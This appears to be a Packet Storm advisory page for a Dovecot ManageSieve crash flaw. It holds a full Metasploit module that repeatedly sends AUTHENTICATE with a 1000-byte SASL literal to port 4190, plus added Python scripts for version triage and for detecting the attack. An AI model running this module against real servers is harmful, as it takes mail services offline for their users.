📄 Dovecot ManageSieve Crash Denial of Service

🗓️ 22 Apr 2026 00:00:00
Reported by: indoushka
Type: packetstorm
🔗 packetstorm.news

Dovecot ManageSieve DoS: AUTHENTICATE with literal SASL crashes service; affects CE 2.4.0–2.4.2 and Pro 3.1.0–3.1.2.
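The summary above gives exact version ranges, which is what a defender needs for inventory triage. The script below is an added example, not part of the Packet Storm post or the Metasploit module; the only facts it encodes are the ranges stated on this page (CE 2.4.0–2.4.2 and Pro 3.1.0–3.1.2 affected, 2.4.3 and 3.1.3 fixed). The `INVENTORY` dict, hostnames and the `2.4.3 (deadbeef)` style of version text are constructed sample data and an assumption about how an admin's inventory might look. Versions older than the listed range are deliberately reported as `not_listed` rather than `safe`, because the page makes no statement about them.

```python
"""Triage Dovecot version strings against the ranges stated in the advisory summary.

Added example, not part of the Packet Storm post or the Metasploit module.
Encodes only the ranges the page gives: CE 2.4.0-2.4.2 and Pro 3.1.0-3.1.2
affected, 2.4.3 and 3.1.3 fixed. INVENTORY below is constructed sample data.
"""
import re
from typing import Dict, Optional, Tuple

Version = Tuple[int, int, int]

# edition -> (first affected version, first fixed version), as stated on the page
AFFECTED_RANGES: Dict[str, Tuple[Version, Version]] = {
    "ce": ((2, 4, 0), (2, 4, 3)),
    "pro": ((3, 1, 0), (3, 1, 3)),
}

VERSION_RE = re.compile(r"\b(\d+)\.(\d+)\.(\d+)\b")


def parse_version(text: str) -> Optional[Version]:
    """Extract the first x.y.z triple from free text; None if there is none."""
    m = VERSION_RE.search(text)
    if m is None:
        return None
    major, minor, patch = (int(g) for g in m.groups())
    return (major, minor, patch)


def classify(edition: str, version_text: str) -> str:
    """Map (edition, version text) to one of:
    'affected'   - inside the listed vulnerable range
    'fixed'      - at or after the version the page says contains the fix
    'not_listed' - older than the listed range; the page makes no statement,
                   so this is deliberately not reported as 'safe'
    'unknown'    - edition not recognised or no version found in the text
    """
    rng = AFFECTED_RANGES.get(edition.strip().lower())
    ver = parse_version(version_text)
    if rng is None or ver is None:
        return "unknown"
    first_affected, first_fixed = rng
    if ver >= first_fixed:
        return "fixed"
    if ver >= first_affected:
        return "affected"
    return "not_listed"


def triage(inventory: Dict[str, Tuple[str, str]]) -> Dict[str, str]:
    """Classify every host in an {host: (edition, version_text)} inventory."""
    return {host: classify(ed, vt) for host, (ed, vt) in inventory.items()}


# Constructed sample inventory (hostnames, versions and the hash are made up;
# the 'x.y.z (hash)' form is an assumption about the inventory's text format).
INVENTORY = {
    "mail-1.example.test": ("CE", "2.4.1"),
    "mail-2.example.test": ("CE", "Dovecot 2.4.3 (deadbeef)"),
    "mail-3.example.test": ("Pro", "3.1.2"),
    "mail-4.example.test": ("CE", "2.3.21"),
    "mail-5.example.test": ("Pro", "version unknown"),
}

if __name__ == "__main__":
    for host, status in sorted(triage(INVENTORY).items()):
        print(f"{host:22s} {status}")
```

Tuple comparison does the range check, so the same table extends to further editions or ranges by adding entries rather than more branches.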

Code
==================================================================================================================================
    | # Title     : Dovecot ManageSieve Crash Denial of Service Metasploit Module                                                    |
    | # Author    : indoushka                                                                                                        |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                 |
    | # Vendor    : https://www.dovecotpro.com/                                                                                      |
    ==================================================================================================================================
    
    [+] Summary    : This Metasploit auxiliary module targets a Denial of Service (DoS) vulnerability in the Dovecot ManageSieve service, where improper handling of authentication requests can lead to service crashes.
    
    
    [+] POC        :  
    
    ##
    # This module requires Metasploit: https://metasploit.com/download
    # Current source: https://github.com/rapid7/metasploit-framework
    ##
    
    class MetasploitModule < Msf::Auxiliary
      include Msf::Auxiliary::Dos
      include Msf::Exploit::Remote::Tcp
    
      def initialize(info = {})
        super(
          update_info(
            info,
            'Name' => 'Dovecot ManageSieve Crash DoS',
            'Description' => %q{
              Dovecot ManageSieve service crashes when receiving an AUTHENTICATE command
              with a literal as SASL initial response. This vulnerability can be exploited
              to repeatedly crash the ManageSieve service, making it unavailable for other
              users.
    
              Affects Dovecot CE core 2.4.0-2.4.2 and Dovecot Pro core 3.1.0-3.1.2.
              Fixed in versions 2.4.3 and 3.1.3.
            },
            'Author' => [
              'indoushka'
            ],
            'References' => [
              ['CVE', '2025-59032'],
              ['URL', 'https://documentation.open-xchange.com/dovecot/security/advisories/html/2026/oxdc-adv-2026-0001.html'],
              ['CWE', '20']
            ],
            'License' => MSF_LICENSE,
            'DisclosureDate' => '2026-03-27'
          )
        )
    
        register_options([
          Opt::RPORT(4190),
          OptInt.new('ATTEMPTS', [true, 'Number of crash attempts', 10])
        ])
      end
    
      def run
        print_status("Dovecot ManageSieve Crash DoS (CVE-2025-59032)")
        print_status("Target: #{peer}")
    
        datastore['ATTEMPTS'].to_i.times do |i|
          print_status("Crash attempt #{i + 1}/#{datastore['ATTEMPTS']}")
          crash_managesieve
          sleep(2)
        end
    
        print_status("DoS attack completed")
      end
    
      def crash_managesieve
        sock = nil
    
        begin
          sock = connect
    
          banner = sock.get_once
          vprint_status("ManageSieve banner: #{banner}")
    
          payload_data = "A" * 1000
          literal = "{#{payload_data.length}}\r\n"
    
          malicious_payload = "AUTHENTICATE \"PLAIN\" #{literal}"
          malicious_payload += payload_data + "\r\n"
    
          sock.put(malicious_payload)
    
          # Rex's get_once(length, timeout): -1 reads whatever is available,
          # waiting up to 5 seconds. A bare get_once(5) would read only 5 bytes.
          response = sock.get_once(-1, 5)
    
          if response.nil?
            print_good("ManageSieve service crashed (no response)")
          else
            vprint_status("Response: #{response}")
          end
    
        rescue ::Errno::ECONNRESET, ::Rex::ConnectionRefused
          print_good("ManageSieve service crashed (connection reset)")
        rescue ::Exception => e
          print_error("Error: #{e.message}")
        ensure
          disconnect(sock) if sock
        end
      end
    end
    	
    Greetings to :==============================================================================
    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
    ============================================================================================
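The module's trigger has a recognisable shape on the wire: an `AUTHENTICATE` command whose SASL initial response is announced as a literal (`{N}` or `{N+}`) instead of being sent as a quoted string, and it is repeated in a loop. The script below is an added example, not part of the Packet Storm post or the Metasploit module; it assumes you have client-to-server ManageSieve lines available per connection (for instance from a proxy or a capture decoded to text). The `SESSIONS` dict, its IP addresses and the base64 PLAIN response are constructed sample data.

```python
"""Flag ManageSieve AUTHENTICATE commands that send the SASL initial response
as a literal rather than a quoted string, and report clients that repeat it.

Added example, not part of the Packet Storm post or the Metasploit module.
Assumes client-to-server lines are available per connection; SESSIONS is
constructed sample data.
"""
import re
from collections import Counter
from dataclasses import dataclass
from typing import Dict, Iterable, List

# AUTHENTICATE <quoted mechanism> <literal opener>. ManageSieve literals look
# like {N} or {N+}; a normal initial response is a quoted string instead.
AUTH_LITERAL_RE = re.compile(
    r'^AUTHENTICATE\s+"(?P<mech>[^"]+)"\s+\{(?P<length>\d+)\+?\}\s*$',
    re.IGNORECASE,
)


@dataclass(frozen=True)
class Finding:
    client: str
    line_no: int
    mechanism: str
    literal_length: int


def scan_session(client: str, lines: Iterable[str]) -> List[Finding]:
    """Return one Finding per AUTHENTICATE line that announces a literal."""
    findings = []
    for line_no, raw in enumerate(lines, start=1):
        m = AUTH_LITERAL_RE.match(raw.rstrip("\r\n"))
        if m:
            findings.append(Finding(client, line_no, m.group("mech"),
                                    int(m.group("length"))))
    return findings


def scan_all(sessions: Dict[str, List[str]]) -> List[Finding]:
    """Scan every client's lines; sessions maps client address -> lines."""
    out: List[Finding] = []
    for client, lines in sessions.items():
        out.extend(scan_session(client, lines))
    return out


def repeat_offenders(findings: Iterable[Finding], threshold: int = 2) -> Dict[str, int]:
    """Clients that sent the literal form at least `threshold` times. The
    module loops its attempts, so repetition from one source is the signal
    worth alerting on rather than a single occurrence."""
    counts = Counter(f.client for f in findings)
    return {c: n for c, n in counts.items() if n >= threshold}


# Constructed sample sessions (client-to-server lines only; addresses are
# documentation ranges, the base64 is "\0john\0pass").
SESSIONS = {
    "192.0.2.10": [
        'AUTHENTICATE "PLAIN" "AGpvaG4AcGFzcw=="',   # ordinary quoted response
        'PUTSCRIPT "vacation" {7+}',                  # literal in a script upload is normal
        'keep;',
        'LOGOUT',
    ],
    "198.51.100.7": [
        'AUTHENTICATE "PLAIN" {1000}',  # literal opener, as the module sends
        "A" * 1000,
        'AUTHENTICATE "PLAIN" {1000}',
        "A" * 1000,
        'AUTHENTICATE "LOGIN" {32+}',   # non-synchronizing form, same class
        "B" * 32,
    ],
}

if __name__ == "__main__":
    found = scan_all(SESSIONS)
    for f in found:
        print(f"{f.client} line {f.line_no}: AUTHENTICATE {f.mechanism} "
              f"literal {{{f.literal_length}}}")
    print("repeat offenders:", repeat_offenders(found))
```

Only the `AUTHENTICATE` command is matched, so literals in `PUTSCRIPT` and other commands, which are the normal way to upload script bodies, do not produce findings.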
